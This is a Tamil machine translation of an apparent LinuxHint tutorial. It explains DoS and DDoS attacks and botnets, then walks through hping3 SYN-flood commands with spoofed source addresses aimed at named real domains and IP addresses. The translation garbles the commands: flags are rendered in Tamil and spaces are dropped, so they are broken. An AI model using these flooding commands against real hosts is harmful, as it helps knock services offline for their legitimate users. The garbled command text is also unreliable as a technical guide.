hping3 வெள்ள ddos

Hping3 Flood Ddos



இந்த பயிற்சி hping3 கருவியைப் பயன்படுத்தி DDOS (விநியோகிக்கப்பட்ட சேவை மறுப்பு) தாக்குதல்களில் கவனம் செலுத்துகிறது. உங்களுக்கு ஏற்கனவே DOS (சேவை மறுப்பு) மற்றும் DDOS தாக்குதல்கள் தெரிந்திருந்தால் நீங்கள் hping3 நடைமுறை அறிவுறுத்தல்களிலிருந்து தொடர்ந்து படிக்கலாம், இல்லையெனில் இந்த தாக்குதல்கள் எவ்வாறு செயல்படுகின்றன என்பதைப் பற்றி அறிய பரிந்துரைக்கப்படுகிறது.

DOS தாக்குதல்கள்


சேவை மறுப்பு (DOS) தாக்குதல் என்பது சேவைகளுக்கான அணுகலை மறுக்க மிகவும் எளிமையான நுட்பமாகும் (அதனால்தான் இது சேவை தாக்குதலை மறுப்பது என்று அழைக்கப்படுகிறது). இந்த தாக்குதலில் இலக்கை அதிகப்படியான பாக்கெட்டுகள் அல்லது அதிக அளவு கொண்டு ஓவர்லோட் செய்வது அடங்கும்.







இந்த தாக்குதலைச் செய்வது மிகவும் எளிதானது என்றாலும், அது இலக்கின் தகவல்களையோ அல்லது தனியுரிமையையோ சமரசம் செய்யாது, இது ஒரு ஊடுருவல் தாக்குதல் அல்ல, இலக்குக்கான அணுகலைத் தடுப்பதை மட்டுமே நோக்கமாகக் கொண்டுள்ளது.
அளவு பாக்கெட்டுகளை அனுப்புவதன் மூலம் இலக்கு தாக்குபவர்களைக் கையாள முடியாது, சேவையகம் முறையான பயனர்களுக்கு சேவை செய்வதைத் தடுக்கிறது.



DOS தாக்குதல்கள் ஒரு சாதனத்திலிருந்து மேற்கொள்ளப்படுகின்றன, எனவே தாக்குபவர் IP ஐ தடுப்பதன் மூலம் அவற்றைத் தடுப்பது எளிது, ஆனால் தாக்குபவர் இலக்கு ஐபி முகவரியை மாற்றலாம் மற்றும் ஏமாற்றலாம் (க்ளோன்) ஆனால் ஃபயர்வால்கள் அத்தகைய தாக்குதல்களைச் சமாளிப்பது கடினம் அல்ல , DDOS தாக்குதல்களால் என்ன நடக்கிறது என்பதற்கு மாறாக.



DDOS தாக்குதல்கள்

விநியோகிக்கப்பட்ட சேவை மறுப்பு (DDOS) ஒரு DOS தாக்குதலைப் போன்றது ஆனால் ஒரே நேரத்தில் வெவ்வேறு முனைகளிலிருந்து (அல்லது வெவ்வேறு தாக்குதல்) மேற்கொள்ளப்படுகிறது. பொதுவாக டிடிஓஎஸ் தாக்குதல்கள் போட்நெட்களால் நடத்தப்படுகின்றன. பாட்நெட்டுகள் தானியங்கி ஸ்கிரிப்டுகள் அல்லது புரோகிராம்கள் ஆகும், இது ஒரு தானியங்கி பணியைச் செய்ய கணினிகளைப் பாதிக்கும் (இந்த விஷயத்தில் ஒரு DDOS தாக்குதல்). ஒரு ஹேக்கர் ஒரு போட்நெட்டை உருவாக்கி, பல கணினிகளில் இருந்து பாட்நெட்கள் DOS தாக்குதல்களைத் தொடங்கலாம், பல பாட்நெட்கள் ஒரே நேரத்தில் DOS தாக்குதலை DDOS தாக்குதலாக மாற்றுகின்றன (அதனால்தான் அது விநியோகிக்கப்பட்டதாக அழைக்கப்படுகிறது).





நிச்சயமாக, DDOS தாக்குதல்கள் உண்மையான மனித தாக்குதல்காரர்களால் நடத்தப்பட்ட விதிவிலக்குகள் உள்ளன, எடுத்துக்காட்டாக உலகெங்கிலும் உள்ள ஆயிரக்கணக்கான மக்களால் ஒருங்கிணைக்கப்பட்ட ஹேக்கர்கள் குழு இந்த நுட்பத்தை அதன் எளிமையான செயல்பாட்டால் அடிக்கடி பயன்படுத்தப்பட்டது (இதற்கு அவர்களின் காரணத்தைப் பகிர்ந்து கொண்ட தன்னார்வலர்கள் மட்டுமே தேவை), உதாரணமாக, படையெடுப்பின் போது கடாபியின் லிபிய அரசாங்கத்தை அநாமதேயர் எவ்வாறு முழுமையாக துண்டித்துவிட்டார், உலகெங்கிலும் இருந்து ஆயிரக்கணக்கான தாக்குதல்களுக்கு முன் லிபிய அரசு பாதுகாப்பற்றதாக இருந்தது.

இந்த வகையான தாக்குதல்கள், பல்வேறு முனைகளில் இருந்து நடத்தப்படும் போது தடுக்க மற்றும் நிறுத்துவதற்கு மிகவும் கடினமாக உள்ளது மற்றும் பொதுவாக சமாளிக்க சிறப்பு வன்பொருள் தேவைப்படுகிறது, ஏனென்றால் ஃபயர்வால்கள் மற்றும் தற்காப்பு பயன்பாடுகள் ஒரே நேரத்தில் ஆயிரக்கணக்கான தாக்குபவர்களை சமாளிக்க தயாராக இல்லை. இது hping3 வழக்கு அல்ல, இந்த கருவி மூலம் நடத்தப்படும் பெரும்பாலான தாக்குதல்கள் தற்காப்பு சாதனங்கள் அல்லது மென்பொருளால் தடுக்கப்படும், ஆனால் இது உள்ளூர் நெட்வொர்க்குகளில் அல்லது மோசமாக பாதுகாக்கப்பட்ட இலக்குகளுக்கு எதிராக பயனுள்ளதாக இருக்கும்.



Hping3 பற்றி

கருவி hping3 நீங்கள் கையாண்ட பாக்கெட்டுகளை அனுப்ப அனுமதிக்கிறது. இந்த கருவி பாக்கெட்டுகளின் அளவு, அளவு மற்றும் துண்டு துண்டாக இருப்பதை கட்டுப்படுத்த உங்களை அனுமதிக்கிறது. பாதுகாப்பு அல்லது திறன் சோதனை நோக்கங்களுக்காக Hping3 பயனுள்ளதாக இருக்கும், அதைப் பயன்படுத்தி நீங்கள் ஃபயர்வால்களின் செயல்திறனை சோதிக்கலாம் மற்றும் ஒரு சேவையகத்தால் அதிக அளவு பாக்கெட்டுகளை கையாள முடியும். பாதுகாப்பு சோதனை நோக்கங்களுக்காக hping3 ஐ எவ்வாறு பயன்படுத்துவது என்பதற்கான வழிமுறைகளை கீழே காணலாம்.

Hping3 ஐப் பயன்படுத்தி DDOS தாக்குதல்களுடன் தொடங்குவது:

டெபியன் மற்றும் அடிப்படையிலான லினக்ஸ் விநியோகங்களில் நீங்கள் hping3 ஐ இயக்குவதன் மூலம் நிறுவலாம்:

#பொருத்தமானநிறுவுhping3மற்றும் மற்றும்

ஒரு எளிய DOS (DDOS அல்ல) தாக்குதல்:

#சூடோhping3-எஸ் --வெள்ளம் -வி -பி 80170.155.9.185

எங்கே:
சூடோ: hping3 ஐ இயக்க தேவையான சலுகைகளை வழங்குகிறது.
hping3:
hping3 நிரலை அழைக்கிறது.
-எஸ்: SYN பாக்கெட்டுகளை குறிப்பிடுகிறது.
-வெள்ளம்: விருப்பப்படி சுடவும், பதில்கள் புறக்கணிக்கப்படும் (அதனால்தான் பதில்கள் காட்டப்படாது) மற்றும் பாக்கெட்டுகள் முடிந்தவரை வேகமாக அனுப்பப்படும்.
-வி: வினைச்சொல்.
-பி 80: போர்ட் 80, நீங்கள் தாக்க விரும்பும் சேவைக்கு இந்த எண்ணை மாற்றலாம்.
170.155.9.185: இலக்கு ஐபி.

போர்ட் 80 க்கு எதிராக SYN பாக்கெட்டுகளைப் பயன்படுத்தி வெள்ளம்:

பின்வரும் உதாரணம் lacampora.org க்கு எதிரான SYN தாக்குதலை சித்தரிக்கிறது:

#சூடோhping3 lacampora.org-க் -என் -டி 120 -எஸ் -பி 80 --வெள்ளம் --ராண்ட்-ஆதாரம்

எங்கே:
Lacampora.org: இலக்கு ஆகும்
-க்: சுருக்கமான வெளியீடு
-n: ஹோஸ்டுக்கு பதிலாக இலக்கு ஐபி காட்டவும்.
-டி 120: தொகுப்பு அளவை அமைக்கவும்
-மூல-ஆதாரம்: ஐபி முகவரியை மறை.

பின்வரும் உதாரணம் மற்றொரு வெள்ள சாத்தியமான உதாரணத்தைக் காட்டுகிறது:

போர்ட் 80 க்கு எதிராக SYN வெள்ளம்:

#சூடோhping3--ராண்ட்-ஆதாரம்ivan.com-எஸ் -க் -பி 80 --வெள்ளம்

Hping3 மூலம் நீங்கள் ஒரு போலி ஐபி மூலம் உங்கள் இலக்குகளைத் தாக்கலாம், ஃபயர்வாலைத் தவிர்ப்பதற்காக நீங்கள் உங்கள் இலக்கு ஐபியைக் கூட க்ளோன் செய்யலாம், அல்லது உங்களுக்குத் தெரிந்த எந்த அனுமதிக்கப்பட்ட முகவரியும் (உதாரணமாக Nmap அல்லது ஒரு ஸ்னிஃபர் மூலம் கேட்கலாம் இணைப்புகள்).

தொடரியல் இருக்கும்:

#சூடோhping3-செய்ய <போலி ஐபி> <இலக்கு> -எஸ் -க் -பி 80 -வேகமாக -சி 2

இந்த நடைமுறை உதாரணத்தில் தாக்குதல் தோன்றும்:

#சூடோhping3-செய்ய190.0.175.100 190.0.175.100-எஸ் -க் -பி 80 -வேகமாக -சி 2

Hping3 குறித்த இந்த பயிற்சி உங்களுக்கு பயனுள்ளதாக இருந்தது என்று நம்புகிறேன். லினக்ஸ் மற்றும் நெட்வொர்க்கிங் பற்றிய கூடுதல் குறிப்புகள் மற்றும் புதுப்பிப்புகளுக்கு லினக்ஸ்ஹிண்டைப் பின்தொடரவும்.